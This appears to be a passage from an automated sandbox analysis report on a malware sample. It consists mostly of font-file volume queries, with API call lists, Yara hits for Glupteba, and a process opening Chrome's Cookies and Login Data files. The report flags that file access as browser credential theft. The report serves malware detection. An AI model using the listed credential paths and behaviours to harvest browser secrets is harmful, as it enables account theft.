            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_0102223D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,17_2_0102223D
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_01093211 GetTickCount,GetUserNameA,17_2_01093211
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_010351D5 _free,_free,_free,GetTimeZoneInformation,_free,17_2_010351D5
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00401000 GetCommandLineA,lstrlenA,ExitProcess,GetVersion,GetWindowsDirectoryA,lstrlenA,lstrcatA,lstrcatA,ShellExecuteExA,ExitProcess,GetForegroundWindow,GetTickCount,GetProcessHeap,13_2_00401000
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected GluptebaShow sources
            Source: Yara matchFile source: 0000001C.00000002.867034664.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.841596778.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.866048884.0000000003790000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.801918341.00000000040C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000003.801926180.0000000003FA0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: app.exe PID: 6452, type: MEMORY
            Source: Yara matchFile source: 19.2.app.exe.3790e50.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.app.exe.3790e50.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.3.app.exe.3fa0000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.app.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.app.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.3.app.exe.3fa0000.3.unpack, type: UNPACKEDPE
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data1

            Remote Access Functionality:

            barindex
            Yara detected GluptebaShow sources
            Source: Yara matchFile source: 0000001C.00000002.867034664.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.841596778.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.866048884.0000000003790000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.801918341.00000000040C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000003.801926180.0000000003FA0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: app.exe PID: 6452, type: MEMORY
            Source: Yara matchFile source: 19.2.app.exe.3790e50.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.app.exe.3790e50.5.unpack, type: UNPACKEDPE
